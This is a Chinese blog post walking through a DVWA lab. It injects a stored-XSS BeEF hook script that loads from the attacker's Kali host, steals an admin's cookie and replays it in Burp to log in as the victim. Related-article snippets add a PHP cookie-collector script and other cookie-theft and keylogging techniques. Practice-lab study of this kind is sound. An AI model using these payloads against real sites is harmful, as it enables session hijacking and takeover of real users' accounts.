利用xss漏洞获取cookie并实现远程登录实验

最新推荐文章于 2024-04-25 10:39:37 发布
最新推荐文章于 2024-04-25 10:39:37 发布
阅读量346 收藏 1
点赞数 2
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81105681/article/details/137974668
版权

本实验用到的环境为:DVWA靶场

  服务器:winserver 2022 (192.168.25.156)

  攻击机:kali

  受害者:win 10

1.

kali攻击机打开beef-xss

恶意代码:

<script src="http://kali的ip:3000/hook.js"></script>

2.

攻击机登录dvwa,打开存在xss漏洞的页面

攻击机登录的账户为smithy

输入恶意代码

注意:这个输入框需要按F12在前端代码中修改最长字符

3.

受害者访问该页面

受害者登录的账户为admin

访问到被注入恶意代码的页面,这时受害者还没有察觉到。

4.

攻击机的beef页面中发现受害者上钩,获得受害者的cookie

5.

访问登录页面192.168.25.156/dvwa/index.php

用burp抓包

用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录

实验结束

php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 814
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
xss获取cookie登陆
weixin_51356351的博客
11-17 1092
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 4377
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
搭建DVWA漏洞环境
m0_62207482的博客
02-20 767
Database” 按钮进行安装,安装成功后则如图2-11所示,单击 “login” 即可登录,默 认账号为admin, 密码为password。件,找到allow_url_include, 把Off 改为On, 然后重启PHP即可解决这个问题,如图 2-12所示。接着修改config 文件夹下的config.inc.php 中数据库的用户名、密码、数据库 名,如图2-10所示。/phpMyAdmin/, 创建名为 “dvwa” 的数据 库,如图2-9所示。
Kali Linux搭建DVWA漏洞靶场(保姆式教学)
apple_51319648的博客
01-06 3082
前提1.搭建好Kali Linux虚拟机2.下载DVMA-master压缩包。
xss漏洞之——漏洞利用
wsnbbz的博客
03-04 1263
1.获取cookie进行无密码登陆 原理 网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器 利用 (1)首先登陆一个页面,抓包获取cookie (2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie (3)页面登陆成功,无需密码 2.利用XSS漏洞获取管理员权限(获取...
XSS学习(cookie远程登录演示)
csjjjd的博客
03-26 1132
打开插件,导出为JSON,然后把这个cookie复制,在另外的火狐浏览器导入你edge浏览器博客园的cookie。说我都要进行一次重新登陆,可是实际之中为什么不是这样的呢?HTTP是无状态的,所按理来说我每进行一次会话,比如我在CSDN发一个帖子,好像按理来。获取你的cookie后能够做出什么事情我上面已经给大家演示过了。其中,每个键值对表示一个特定的属性或数值。首先我是用edge浏览器和火狐浏览器上安装这个插件。我是用博客园这个网站做演示,首先登录你的账号,然后。这个例子中包含了两个键值对(
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7427
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5680
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1252
XSS
XSS漏洞
最新发布
2401_83181186的博客
04-25 1009
XSS漏洞介绍以及beef,waf简介
-----已搬运-----反射型xss获取cookie(本地实现)
Zero_Adam的博客
02-17 2262
目录:1.最简单的反射性xss获取cookie注意!!!! 1.最简单的反射性xss获取cookie <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'
dvwaXSS(reflected)
ANDTM的博客
06-07 429
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据注入的恶意代码是否存储在服务器数据库中,XSS可以分为存储型的XSS与反射型的XSS,还有DOM型的XSS由于其特殊性,常常被分为第三种。SS利用的常见用途:盗取用户cookies、劫持会话、流量劫持、网页挂马、DDOS、提升权限…
DVWA靶机,通过XSS盗取cookie登录
weixin_42786460的博客
09-15 1263
DVWA靶机,通过XSS盗取cookie登录
XSS漏洞利用cookie获取
内心不种满鲜花就会长满杂草
08-01 1万+
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 826
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
使用XSS漏洞获取用户cookie并免密登录实验
qq_43395215的博客
05-17 3361
使用XSS漏洞盗取cookie,并绕过密码登录 首先环境的搭建,使用DVWA平台的XSS漏洞,这个DVWAXSS漏洞在前面都讲过,所以我们直接使用LOW等级获取cookie,并保存在Web服务器上,这里使用LOW等级是为了方便,其他等级都是一样的做法,只是构造的脚本不同 使用脚本获取cookie <script>alert(document.cookie)</script> 这是一个很简单的XSS漏洞,可以弹出用户的cookie,但是现在我们不是要将cookie弹出,而是将其保存
XSS漏洞之加载远程js文件
baiao3360的博客
09-11 1927
前言 这次在对一个系统渗透测试过程中,发现一个XSS漏洞,可弹窗,并且没有httponly,但是在尝试加载远程js文件的时候发现,script标签被过滤掉了,准确的说应该是服务器后端在识别到输入内容有<>的时候,会把每对尖括号以及尖括号里面的内容都过滤掉,唯独有一个特例,就是img标签不会。 在网上找了一些资料,发现可以用img来加载远程js,陆陆续续试过以下几个方法: ...
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3935
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
利用xss漏洞窃取cookie登录
热门推荐
黑面狐
08-23 1万+
今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 保存以后,我让另一个同事登录,并点击这个模块。 这是XSS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值